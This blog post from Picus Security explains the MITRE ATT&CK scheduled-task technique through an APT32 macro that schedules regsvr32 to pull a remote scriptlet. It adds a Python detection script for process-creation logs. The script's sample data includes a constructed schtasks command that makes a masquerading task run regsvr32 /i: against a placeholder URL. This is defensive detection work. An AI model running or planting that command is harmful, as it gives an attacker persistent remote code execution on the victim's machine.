Published in Picus Security

How to Simulate and Detect MITRE ATT&CK T1053 Scheduled Task/Job Technique

by Süleyman Özarslan, PhD

A scheduled task is a command, program or script to be executed:

  • at a particular time in the future (e.g. 11/08/2022 1:00 a.m.)
  • at regular intervals (e.g. every Monday at 1:00 a.m.)
  • when a defined event occurs (e.g. a user logs on to the system).

Legitimate users like system administrators use scheduled tasks to create and run operational tasks automatically. Adversaries also use task scheduling utilities of operating systems to execute malicious payloads on a defined schedule or at system startup to achieve persistence. Our research has found that Scheduled Task was the seventh most prevalent MITRE ATT&CK technique used by adversaries in their malware.

Red and Blue Team Exercises

Red Teaming — How to simulate?

In this exercise, we explain a real scheduled task command in a malicious VBA macro in a Word document that was used by the APT32 Threat Group.

This payload was included in the following Word document:

Briefly, the command below, taken from the VBA code embedded in the Word document, creates a scheduled task named SystemSoundsServices (mimicking the System Sounds service of Windows) that runs Regsvr32.exe every 30 minutes. Regsvr32.exe is used to bypass application whitelisting and script protection by executing a Component Object Model (COM) scriptlet that is dynamically downloaded from the given URL.

In conclusion, the given code incorporates the following MITRE ATT&CK techniques:

  • T1053.005 Scheduled Task
  • T1036.004 Masquerading: Masquerade Task or Service
  • T1218.010 Signed Binary Proxy Execution: Regsvr32
  • T1559.001 Inter-Process Communication: Component Object Model

If you’d like to learn more about MITRE ATT&CK, check out our LinkedIn group with all the latest! https://www.linkedin.com/groups/8955879/

Blue Teaming — How to detect?

The following Sigma rule can be used to detect creating a scheduled task that runs regsvr32.exe via schtasks.exe.
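The same detection logic, written out in Python so it can be run over sample log lines, as an added example (this is not the article's Sigma rule and not Picus code). It assumes process-creation events with Image, ParentImage and CommandLine fields as Sysmon Event ID 1 or Security 4688 provide them, flattened here into a constructed "key=value|key=value" layout; the sample events, the task action with the usual regsvr32 /s /n /u /i:<url> scrobj.dll scriptlet invocation, and the placeholder URL are all constructed, since the article reproduces the real command only as an image. The checks go a step beyond the Sigma rule described above: besides schtasks.exe creating a task that runs regsvr32.exe, they also flag a remote scriptlet URL in the action and an Office application as the parent process, and they pull out the task name and repetition interval so an analyst can see the masquerading name and the 30-minute schedule at a glance.

```python
"""Detection logic for T1053.005 scheduled tasks whose action proxies execution
through regsvr32.exe, run over constructed process-creation log lines.

Added example, not the article's Sigma rule. Field names follow Sysmon Event
ID 1 / Security 4688 conventions; the "key=value|key=value" line layout and
every event below are constructed for this example.
"""
import re
from dataclasses import dataclass, field

# Constructed sample events, one per line.
SAMPLE_EVENTS = [
    # Benign: an administrator scheduling a nightly backup from a console.
    "Image=C:\\Windows\\System32\\schtasks.exe|ParentImage=C:\\Windows\\System32\\cmd.exe|"
    "CommandLine=schtasks /create /tn NightlyBackup "
    "/tr \"powershell -File C:\\ops\\backup.ps1\" /sc daily /st 01:00",
    # Suspicious: Word spawns schtasks; the task runs regsvr32 every 30 minutes
    # against a remote scriptlet (placeholder URL, not the one from the sample).
    "Image=C:\\Windows\\System32\\schtasks.exe|"
    "ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE|"
    "CommandLine=schtasks /create /sc minute /mo 30 /tn \"SystemSoundsServices\" "
    "/tr \"regsvr32.exe /s /n /u /i:http://example.invalid/payload.sct scrobj.dll\" /f",
    # Unrelated process creation; must be ignored.
    "Image=C:\\Windows\\System32\\notepad.exe|ParentImage=C:\\Windows\\explorer.exe|"
    "CommandLine=notepad.exe notes.txt",
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
VALUE_SWITCHES = {"/tn", "/tr", "/sc", "/mo", "/st", "/ru"}  # switches that take an argument
SCRIPTLET_RE = re.compile(r"/i:https?://", re.IGNORECASE)   # regsvr32 pulling a scriptlet over HTTP(S)
_TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping quoted spans as one token."""
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in _TOKEN_RE.finditer(cmdline)]


def parse_schtasks(cmdline):
    """Return (flags, values): lowercase bare switches such as '/create', and
    the argument of each value-taking switch such as '/tr'."""
    tokens = tokenize(cmdline)
    flags, values = set(), {}
    i = 0
    while i < len(tokens):
        tok = tokens[i].lower()
        if tok in VALUE_SWITCHES and i + 1 < len(tokens):
            values[tok] = tokens[i + 1]
            i += 2
            continue
        if tok.startswith("/"):
            flags.add(tok)
        i += 1
    return flags, values


@dataclass
class TaskCreation:
    name: str
    action: str
    schedule: str
    parent: str
    findings: list = field(default_factory=list)

    @property
    def suspicious(self):
        return bool(self.findings)


def analyze_event(line):
    """Return a TaskCreation for a 'schtasks /create' event, or None for anything else."""
    event = dict(part.split("=", 1) for part in line.split("|"))
    if not event.get("Image", "").lower().endswith("\\schtasks.exe"):
        return None
    flags, values = parse_schtasks(event.get("CommandLine", ""))
    if "/create" not in flags:
        return None
    action = values.get("/tr", "")
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    schedule = values.get("/sc", "?").lower()
    if "/mo" in values:                       # repetition modifier, e.g. every 30 minutes
        schedule += "/" + values["/mo"]
    task = TaskCreation(name=values.get("/tn", "?"), action=action,
                        schedule=schedule, parent=parent)
    if "regsvr32" in action.lower():
        task.findings.append("T1218.010: task action runs regsvr32.exe")
        if SCRIPTLET_RE.search(action):
            task.findings.append("T1559.001: regsvr32 /i: loads a scriptlet from a remote URL")
    if parent in OFFICE_PARENTS:
        task.findings.append(f"schtasks.exe spawned by an Office application ({parent})")
    return task


def scan(lines):
    """Run analyze_event over a batch of log lines and keep only task-creation events."""
    return [t for t in (analyze_event(line) for line in lines) if t is not None]


if __name__ == "__main__":
    for task in scan(SAMPLE_EVENTS):
        print(f"[{'ALERT' if task.suspicious else 'ok'}] task={task.name!r} "
              f"schedule={task.schedule} parent={task.parent}")
        for finding in task.findings:
            print("   -", finding)
```

The benign backup task produces no findings, while the constructed APT32-style event is reported with three: the regsvr32 action, the remote scriptlet URL and the Office parent. Matching on the /tr argument rather than the whole command line keeps tasks that merely mention regsvr32 in their name from firing, and the parent-process check is what separates a macro-driven task creation from an administrator typing the same command in a console.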

Originally published at https://www.picussecurity.com.
